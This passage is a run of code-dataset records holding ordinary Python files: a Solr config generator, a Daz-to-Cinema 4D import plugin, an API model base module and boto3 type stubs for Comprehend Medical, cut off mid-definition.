{1}\".format(sortfile,os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir)))\n\nlogging.info(\" End Calculation\")\n\nexit(0)\n\n","sub_path":"MiSeqStat7.py","file_name":"MiSeqStat7.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"347728510","text":"# Create Solr ZCML include from environment variables\n\nfrom os import environ\n\n\ndef main():\n solr_zcml_file = '/app/etc/package-includes/002-solr-overrides.zcml'\n\n host = environ.get('SOLR_HOST', 'solr')\n port = environ.get('SOLR_PORT', '8983')\n base = environ.get('SOLR_BASE', '/solr/ogsite')\n upload_blobs = environ.get('SOLR_UPLOAD_BLOBS', 'true')\n\n solr_zcml = SOLR_ZCML_TEMPLATE.format(\n host=host, port=port, base=base, upload_blobs=upload_blobs)\n\n with open(solr_zcml_file, 'w') as file_:\n file_.write(solr_zcml)\n\n\nSOLR_ZCML_TEMPLATE = \"\"\"\\\n\n \n \n\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"docker/core/entrypoint.d/create_solr_zcml.py","file_name":"create_solr_zcml.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575378101","text":"import c4d\nimport os\nimport sys\nfrom c4d import documents, gui\n\nfrom .CustomCmd import Cinema4DCommands as dzc4d\nfrom . import DtuLoader\nfrom . import StandardMaterials\nfrom . import Utilities\nfrom . import Morphs\nfrom . import DazRig\nfrom . import Animations\nfrom .DtC4DWeights import Weights\nfrom .DtC4DPosing import Poses\nfrom .DtC4DDialogs import guiASKtoSave\nfrom .Definitions import EXPORT_DIR\n\ndazReduceSimilar = True\n\n\nclass CustomImports:\n \"\"\"\n Import Logic for Importing in the DTU File (JSON)\n \"\"\"\n\n # Hidden\n def manual_import_genesis(self, path):\n \"\"\"\n Manually Imports Figure of the Given Path\n \"\"\"\n dtu = DtuLoader.DtuLoader(path)\n fbx_path = dtu.get_fbx_path()\n self.genesis_import(fbx_path, dtu)\n\n def manual_import_prop(self, path):\n \"\"\"\n Manually Import Prop/Environment of the Given Path\n \"\"\"\n dtu = DtuLoader.DtuLoader(path)\n fbx_path = dtu.get_fbx_path()\n self.prop_import(fbx_path, dtu)\n\n def auto_import_genesis(self, sss_value, normal_value, bump_value):\n import_list = self.get_genesis_list()\n current_dir = os.getcwd()\n os.chdir(EXPORT_DIR)\n if import_list:\n for imported_dir in import_list:\n dtu = DtuLoader.DtuLoader(imported_dir)\n fbx_path = dtu.get_fbx_path()\n self.genesis_import(fbx_path, dtu, sss_value, normal_value, bump_value)\n\n os.chdir(current_dir)\n\n def auto_import_prop(self, sss_value, normal_value, bump_value):\n import_list = self.get_prop_list()\n current_dir = os.getcwd()\n os.chdir(EXPORT_DIR)\n if import_list:\n for imported_dir in import_list:\n dtu = DtuLoader.DtuLoader(imported_dir)\n fbx_path = dtu.get_fbx_path()\n self.prop_import(fbx_path, dtu, sss_value, normal_value, bump_value)\n os.chdir(current_dir)\n\n def genesis_import(self, file_path, dtu, sss_value, normal_value, bump_value):\n mat = StandardMaterials.StdMaterials()\n morph = Morphs.Morphs()\n var = Utilities.Variables()\n jnt_fixes = DazRig.JointFixes()\n wgt = Weights()\n anim = Animations.Animations()\n pose = Poses()\n\n if os.path.exists(file_path) == False:\n gui.MessageDialog(\n \"Nothing to import.\\nYou have to export from DAZ Studio first\",\n c4d.GEMB_OK,\n )\n return 0\n print(\"Import FBX from : {0}\".format(os.path.dirname(file_path)))\n c4d.EventAdd()\n self.import_daz_fbx(file_path)\n c4d.EventAdd()\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n dzc4d.deselect_all() # Deselect All\n\n screen = c4d.gui.GeGetScreenDimensions(0, 0, True)\n\n c4d.EventAdd()\n dzc4d.update_viewport()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n c4d.EventAdd()\n\n var.store_dtu(dtu)\n if var.prepare_variables():\n gui.MessageDialog(\n \"Import Failed.\\nYou can check the console for more info (Shift + F10)\",\n c4d.GEMB_OK,\n )\n print(\"Import Failed\")\n return\n print(\"Import Done\")\n\n print(\"Starting Material Updates\")\n\n c4d.EventAdd()\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n mat.store_materials(dtu)\n mat.store_sliders(sss_value, normal_value, bump_value)\n mat.update_materials()\n\n print(\"Material Conversion Done\")\n c4d.EventAdd()\n\n wgt.store_subdivision(dtu)\n if wgt.check_level():\n auto_weight = c4d.gui.QuestionDialog(\n \"Subdivisions have been detected\\nthis is currently not fully supported.\\nWould you like to autoweight the mesh?\"\n )\n if auto_weight:\n wgt.auto_calculate_weights(var.body)\n\n pose.store_pose(dtu)\n pose.store_offset(dtu)\n is_posed = pose.checkIfPosed()\n is_anim = anim.check_animation_exists(var.c_joints)\n clear_pose = False\n if is_posed:\n clear_pose = gui.QuestionDialog(\n \"Importing Posed Figure is currently not fully supported\\nWould you like to try to fix bone orientation?\",\n )\n if clear_pose:\n pose.clear_pose(var.c_joints)\n pose.fix_offset(var.c_joints, var.c_skin_data)\n\n if is_anim == False or clear_pose:\n jnt_fixes.store_joint_orientations(dtu)\n jnt_fixes.fix_joints(var.c_skin_data, var.c_joints, var.c_meshes)\n c4d.EventAdd()\n dzc4d.deselect_all()\n if is_posed:\n pose.restore_pose(var.c_joints)\n make_tpose = gui.QuestionDialog(\n \"Would you like to Convert\\nthe Base Pose to a T-Pose?\",\n )\n if make_tpose:\n pose.preAutoIK()\n c4d.EventAdd()\n\n else:\n gui.MessageDialog(\n \"Animation or a Pose was Detected\\nJoint Orientation has not been fixed\",\n type=c4d.GEMB_ICONEXCLAMATION,\n )\n c4d.EventAdd()\n\n if var.body.GetTag(c4d.Tposemorph):\n print(\"Starting Morph Updates\")\n morph.store_morph_links(dtu)\n morph.store_variables(\n var.body, var.c_meshes, var.c_joints, var.skeleton, var.c_poses\n )\n morph.morphs_to_delta()\n morph.delete_morphs(var.c_meshes)\n morph.connect_morphs_to_parents(var.body, var.c_meshes)\n morph.add_drivers()\n morph.rename_morphs(var.c_meshes)\n print(\"Morph Corrections Done\")\n c4d.EventAdd()\n\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n\n self.dialog = guiASKtoSave()\n self.dialog.Open(\n dlgtype=c4d.DLG_TYPE_MODAL,\n xpos=screen[\"sx2\"] // 2 - 210,\n ypos=screen[\"sy2\"] // 2 - 100,\n defaultw=200,\n defaulth=150,\n )\n\n def prop_import(self, file_path, dtu, sss_value, normal_value, bump_value):\n\n mat = StandardMaterials.StdMaterials()\n if os.path.exists(file_path) == False:\n gui.MessageDialog(\n \"Nothing to import.\\nYou have to export from DAZ Studio first\",\n c4d.GEMB_OK,\n )\n return 0\n print(\"Import FBX from : {0}\".format(os.path.dirname(file_path)))\n self.import_daz_fbx(file_path)\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n dzc4d.deselect_all() # Deselect All\n\n screen = c4d.gui.GeGetScreenDimensions(0, 0, True)\n\n c4d.EventAdd()\n dzc4d.update_viewport()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n c4d.EventAdd()\n print(\"Import Done\")\n\n print(\"Starting Material Updates\")\n c4d.EventAdd()\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n mat.store_materials(dtu)\n mat.store_sliders(sss_value, normal_value, bump_value)\n mat.update_materials()\n\n print(\"Material Conversion Done\")\n c4d.EventAdd()\n\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n\n self.dialog = guiASKtoSave()\n self.dialog.Open(\n dlgtype=c4d.DLG_TYPE_MODAL,\n xpos=screen[\"sx2\"] // 2 - 210,\n ypos=screen[\"sy2\"] // 2 - 100,\n defaultw=200,\n defaulth=150,\n )\n\n def import_daz_fbx(self, file_path):\n \"\"\" \"\"\"\n flags = (\n c4d.SCENEFILTER_OBJECTS\n | c4d.SCENEFILTER_MATERIALS\n | c4d.SCENEFILTER_MERGESCENE\n )\n\n file = c4d.documents.LoadDocument(\n str(file_path),\n flags,\n )\n c4d.documents.InsertBaseDocument(file)\n\n def get_genesis_list(self):\n \"\"\"\n Returns the Absolute Paths of the Exports from Daz for Figures\n \"\"\"\n import_list = []\n if os.path.exists(os.path.join(EXPORT_DIR, \"FIG\")):\n for i in os.listdir(os.path.join(EXPORT_DIR, \"FIG\")):\n import_list.append(os.path.join(EXPORT_DIR, \"FIG\", i))\n return import_list\n else:\n gui.MessageDialog(\n \"Could Not find Exported File from Daz Studio\",\n type=c4d.GEMB_ICONEXCLAMATION,\n )\n\n def get_prop_list(self):\n \"\"\"\n Returns the Absolute Paths of the Exports from Daz for Environments and Props\n \"\"\"\n import_list = []\n if os.path.exists(os.path.join(EXPORT_DIR, \"ENV\")):\n for i in os.listdir(os.path.join(EXPORT_DIR, \"ENV\")):\n import_list.append(os.path.join(EXPORT_DIR, \"ENV\", i))\n return import_list\n else:\n gui.MessageDialog(\n \"Could Not find Exported File from Daz Studio\",\n type=c4d.GEMB_ICONEXCLAMATION,\n )\n","sub_path":"Cinema 4D/appdir_common/plugins/DazToC4D/lib/CustomImports.py","file_name":"CustomImports.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"4023722","text":"from typing import Dict, List\nfrom abc import ABC, abstractmethod\n\n\n__all__ = ['Elem', 'ElemList', 'ElemGroup', 'Model', 'Index']\n\n\nclass BaseElem(ABC):\n __slots__ = ('keys', '_transform')\n\n def __init__(self, *keys):\n self.keys = keys\n self._transform = None\n\n def __repr__(self):\n return f'{self.__class__.__name__}({\" \".join(self.keys)})'\n\n def set_transform(self, t):\n \"\"\"\n Callable that will transform input data after parsing. For example, to enforce a type.\n Set during model subclass load.\n \"\"\"\n if t is not None:\n self._transform = t\n\n def do_transform(self, model: 'Model', data):\n \"\"\"\n Transform input data (already parsed and filtered) into usable output.\n \"\"\"\n if len(data) == 1:\n data = list(data.values())[0]\n\n if data is None:\n return\n\n if issubclass(self._transform, Model):\n return self._transform(model.client, data)\n elif isinstance(data, dict):\n return self._transform(**data)\n elif data is not None:\n return self._transform(data)\n\n @abstractmethod\n def parse(self, model: 'Model', data):\n \"\"\"\n Parse data and return relevant data to be returned from the attribute.\n \"\"\"\n\n\nclass Elem(BaseElem):\n \"\"\"\n class _(Model):\n a: str = Elem('a')\n\n simple element.\n multiple keys can be specified to pass multiple data entries to the transform\n \"\"\"\n __slots__ = () # make sure this doesn't get assigned a __dict__\n\n def parse(self, model: 'Model', data):\n return self.do_transform(model, {k: data.get(k, None) for k in self.keys})\n\n\nclass ElemList(BaseElem):\n \"\"\"\n class _(Model):\n a: str = ElemList('a')\n\n Ensure that at least the first key given is a list in the data\n \"\"\"\n __slots__ = () # make sure this doesn't get assigned a __dict__\n\n def parse(self, model: 'Model', data):\n return [\n self.do_transform(model, {\n key: data[key][i] if isinstance(data[key], list) else data[key]\n for key in self.keys\n })\n # since we requested the first key get us an iterable, we can base the length on this\n for i in range(len(data[self.keys[0]]))\n ]\n\n\nclass ElemGroup(BaseElem):\n \"\"\"\n class _(Model):\n a: str = Elem('a*', 'b')[3]\n b: str = Elem('c*', 'b')[1:4]\n\n Groups up params following a pattern including a number and returns a list\n \"\"\"\n __slots__ = ('range',)\n\n def __init__(self, *keys):\n super().__init__(*keys)\n self.range = None\n\n def __getitem__(self, item):\n self.range = item\n return self\n\n def parse(self, model: 'Model', data):\n if self.range is None:\n raise TypeError(\"No range provided in ElemGroup[...]\")\n\n # convert __getitem__ input to a range to iterate over\n if isinstance(self.range, slice):\n r = range(self.range.start or 0, self.range.stop+1, self.range.step or 1)\n else:\n r = range(self.range+1) # int input\n\n return [a for a in[\n # execute the Element transform over this key variation\n self.do_transform(model, {\n # generate this key variation and include it in the data\n # keys not containing * are passed untouched to each transform\n k.replace('*', ''): data[k.replace('*', str(i))]\n for k in self.keys\n })\n for i in r # iterate over possible key variations\n ] if a is not None]\n\n\n\nclass Model:\n __slots__ = ('client', '_raw_data_',) # in case subclasses want to use __slots__\n\n elems: Dict[str, BaseElem]\n __repr_attrs__: List[str] = ['id']\n\n def __init__(self, client, _dct=None, **kwargs):\n\n self.client = client\n\n # allow a dict to be passed in directly\n # allows Models to be set as Elem transforms easily\n if _dct is not None:\n kwargs.update(_dct)\n\n # store raw data as a pass-through for backwards-compatibility\n self._raw_data_ = kwargs\n\n @classmethod\n def __init_subclass__(cls):\n \"\"\"called when anything subclasses Model, lets us process the attributes\"\"\"\n super().__init_subclass__()\n # filter to only Elems\n cls.elems = {}\n for k, e in cls.__dict__.items():\n if isinstance(e, BaseElem):\n e.set_transform(cls.__annotations__.get(k, None))\n cls.elems[k] = e\n\n def __getattribute__(self, item):\n if item in super(Model, self).__getattribute__('elems'):\n try:\n return self.elems[item].parse(self, self._raw_data_)\n except KeyError:\n raise AttributeError(item)\n else:\n return super(Model, self).__getattribute__(item)\n\n def __repr__(self):\n # TODO: sloppy and doesn't work well\n repr_attrs = [\n f'{e}:{getattr(self, e)}'\n for e in self.__repr_attrs__\n if getattr(self, e, None) is not None\n ]\n return f\"{self.__class__.__name__}({' '.join(repr_attrs)})\"\n\n def __getitem__(self, key):\n \"\"\"\n For backwards compatibility, this class can be used like a dict.\n This will function as a simple pass-through to the stored raw data.\n \"\"\"\n return self._raw_data_[key]\n\n @classmethod\n def columns(cls):\n s = set()\n for e in cls.elems.values():\n s.update(e.keys)\n\n return list(s)\n\n\nclass Index:\n \"\"\"\n Represents something that can be accessed at a /index/id endpoint.\n Subclassing this simply adds it to a dict so it can be looked up later.\n This lets Result.get() work for example.\n Could add more in the future\n \"\"\"\n types: Dict[str, type] = {}\n\n @classmethod\n def __init_subclass__(cls):\n super().__init_subclass__()\n Index.types[cls.__name__.lower()] = cls\n","sub_path":"xivapi/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"430053296","text":"\"\"\"\nType annotations for comprehendmedical service client.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html)\n\nUsage::\n\n ```python\n import boto3\n from mypy_boto3_comprehendmedical import ComprehendMedicalClient\n\n client: ComprehendMedicalClient = boto3.client(\"comprehendmedical\")\n ```\n\"\"\"\nimport sys\nfrom typing import Any, Dict, Type\n\nfrom botocore.client import BaseClient, ClientMeta\n\nfrom .type_defs import (\n ComprehendMedicalAsyncJobFilterTypeDef,\n DescribeEntitiesDetectionV2JobResponseTypeDef,\n DescribeICD10CMInferenceJobResponseTypeDef,\n DescribePHIDetectionJobResponseTypeDef,\n DescribeRxNormInferenceJobResponseTypeDef,\n DescribeSNOMEDCTInferenceJobResponseTypeDef,\n DetectEntitiesResponseTypeDef,\n DetectEntitiesV2ResponseTypeDef,\n DetectPHIResponseTypeDef,\n InferICD10CMResponseTypeDef,\n InferRxNormResponseTypeDef,\n InferSNOMEDCTResponseTypeDef,\n InputDataConfigTypeDef,\n ListEntitiesDetectionV2JobsResponseTypeDef,\n ListICD10CMInferenceJobsResponseTypeDef,\n ListPHIDetectionJobsResponseTypeDef,\n ListRxNormInferenceJobsResponseTypeDef,\n ListSNOMEDCTInferenceJobsResponseTypeDef,\n OutputDataConfigTypeDef,\n StartEntitiesDetectionV2JobResponseTypeDef,\n StartICD10CMInferenceJobResponseTypeDef,\n StartPHIDetectionJobResponseTypeDef,\n StartRxNormInferenceJobResponseTypeDef,\n StartSNOMEDCTInferenceJobResponseTypeDef,\n StopEntitiesDetectionV2JobResponseTypeDef,\n StopICD10CMInferenceJobResponseTypeDef,\n StopPHIDetectionJobResponseTypeDef,\n StopRxNormInferenceJobResponseTypeDef,\n StopSNOMEDCTInferenceJobResponseTypeDef,\n)\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\"ComprehendMedicalClient\",)\n\nclass BotocoreClientError(BaseException):\n MSG_TEMPLATE: str\n\n def __init__(self, error_response: Dict[str, Any], operation_name: str) -> None:\n self.response: Dict[str, Any]\n self.operation_name: str\n\nclass Exceptions:\n ClientError: Type[BotocoreClientError]\n InternalServerException: Type[BotocoreClientError]\n InvalidEncodingException: Type[BotocoreClientError]\n InvalidRequestException: Type[BotocoreClientError]\n ResourceNotFoundException: Type[BotocoreClientError]\n ServiceUnavailableException: Type[BotocoreClientError]\n TextSizeLimitExceededException: Type[BotocoreClientError]\n TooManyRequestsException: Type[BotocoreClientError]\n ValidationException: Type[BotocoreClientError]\n\nclass ComprehendMedicalClient(BaseClient):\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html)\n \"\"\"\n\n meta: ClientMeta\n\n @property\n def exceptions(self) -> Exceptions:\n \"\"\"\n ComprehendMedicalClient exceptions.\n \"\"\"\n def can_paginate(self, operation_name: str) -> bool:\n \"\"\"\n Check if an operation can be paginated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.can_paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#can_paginate)\n \"\"\"\n def close(self) -> None:\n \"\"\"\n Closes underlying endpoint connections.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.close)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#close)\n \"\"\"\n def describe_entities_detection_v2_job(\n self, *, JobId: str\n ) -> DescribeEntitiesDetectionV2JobResponseTypeDef:\n \"\"\"\n Gets the properties associated with a medical entities detection job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_entities_detection_v2_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_entities_detection_v2_job)\n \"\"\"\n def describe_icd10_cm_inference_job(\n self, *, JobId: str\n ) -> DescribeICD10CMInferenceJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an InferICD10CM job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_icd10_cm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_icd10_cm_inference_job)\n \"\"\"\n def describe_phi_detection_job(self, *, JobId: str) -> DescribePHIDetectionJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with a protected health information (PHI)\n detection job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_phi_detection_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_phi_detection_job)\n \"\"\"\n def describe_rx_norm_inference_job(\n self, *, JobId: str\n ) -> DescribeRxNormInferenceJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an InferRxNorm job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_rx_norm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_rx_norm_inference_job)\n \"\"\"\n def describe_snomedct_inference_job(\n self, *, JobId: str\n ) -> DescribeSNOMEDCTInferenceJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an InferSNOMEDCT job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.describe_snomedct_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#describe_snomedct_inference_job)\n \"\"\"\n def detect_entities(self, *, Text: str) -> DetectEntitiesResponseTypeDef:\n \"\"\"\n The `DetectEntities` operation is deprecated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.detect_entities)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#detect_entities)\n \"\"\"\n def detect_entities_v2(self, *, Text: str) -> DetectEntitiesV2ResponseTypeDef:\n \"\"\"\n Inspects the clinical text for a variety of medical entities and returns\n specific information about them such as entity category, location, and\n confidence score on that information.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.detect_entities_v2)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#detect_entities_v2)\n \"\"\"\n def detect_phi(self, *, Text: str) -> DetectPHIResponseTypeDef:\n \"\"\"\n Inspects the clinical text for protected health information (PHI) entities and\n returns the entity category, location, and confidence score for each entity.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.detect_phi)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#detect_phi)\n \"\"\"\n def generate_presigned_url(\n self,\n ClientMethod: str,\n Params: Dict[str, Any] = None,\n ExpiresIn: int = 3600,\n HttpMethod: str = None,\n ) -> str:\n \"\"\"\n Generate a presigned url given a client, its method, and arguments.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.generate_presigned_url)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#generate_presigned_url)\n \"\"\"\n def infer_icd10_cm(self, *, Text: str) -> InferICD10CMResponseTypeDef:\n \"\"\"\n InferICD10CM detects medical conditions as entities listed in a patient record\n and links those entities to normalized concept identifiers in the ICD-10-CM\n knowledge base from the Centers for Disease Control.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.infer_icd10_cm)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#infer_icd10_cm)\n \"\"\"\n def infer_rx_norm(self, *, Text: str) -> InferRxNormResponseTypeDef:\n \"\"\"\n InferRxNorm detects medications as entities listed in a patient record and links\n to the normalized concept identifiers in the RxNorm database from the National\n Library of Medicine.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.infer_rx_norm)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#infer_rx_norm)\n \"\"\"\n def infer_snomedct(self, *, Text: str) -> InferSNOMEDCTResponseTypeDef:\n \"\"\"\n InferSNOMEDCT detects possible medical concepts as entities and links them to\n codes from the Systematized Nomenclature of Medicine, Clinical Terms (SNOMED-CT)\n ontology See also: `AWS API Documentation `_ **Re...\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.infer_snomedct)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#infer_snomedct)\n \"\"\"\n def list_entities_detection_v2_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListEntitiesDetectionV2JobsResponseTypeDef:\n \"\"\"\n Gets a list of medical entity detection jobs that you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_entities_detection_v2_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_entities_detection_v2_jobs)\n \"\"\"\n def list_icd10_cm_inference_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListICD10CMInferenceJobsResponseTypeDef:\n \"\"\"\n Gets a list of InferICD10CM jobs that you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_icd10_cm_inference_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_icd10_cm_inference_jobs)\n \"\"\"\n def list_phi_detection_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListPHIDetectionJobsResponseTypeDef:\n \"\"\"\n Gets a list of protected health information (PHI) detection jobs that you have\n submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_phi_detection_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_phi_detection_jobs)\n \"\"\"\n def list_rx_norm_inference_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListRxNormInferenceJobsResponseTypeDef:\n \"\"\"\n Gets a list of InferRxNorm jobs that you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_rx_norm_inference_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_rx_norm_inference_jobs)\n \"\"\"\n def list_snomedct_inference_jobs(\n self,\n *,\n Filter: \"ComprehendMedicalAsyncJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListSNOMEDCTInferenceJobsResponseTypeDef:\n \"\"\"\n Gets a list of InferSNOMEDCT jobs a user has submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.list_snomedct_inference_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#list_snomedct_inference_jobs)\n \"\"\"\n def start_entities_detection_v2_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartEntitiesDetectionV2JobResponseTypeDef:\n \"\"\"\n Starts an asynchronous medical entity detection job for a collection of\n documents.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_entities_detection_v2_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_entities_detection_v2_job)\n \"\"\"\n def start_icd10_cm_inference_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n LanguageCode: Literal[\"en\"],\n JobName: str = None,\n ClientRequestToken: str = None,\n KMSKey: str = None\n ) -> StartICD10CMInferenceJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous job to detect medical conditions and link them to the\n ICD-10-CM ontology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/comprehendmedical.html#ComprehendMedical.Client.start_icd10_cm_inference_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html#start_icd10_cm_inference_job)\n \"\"\"\n def start_phi_detection_job(\n self,\n *,\n InputDataConfig: 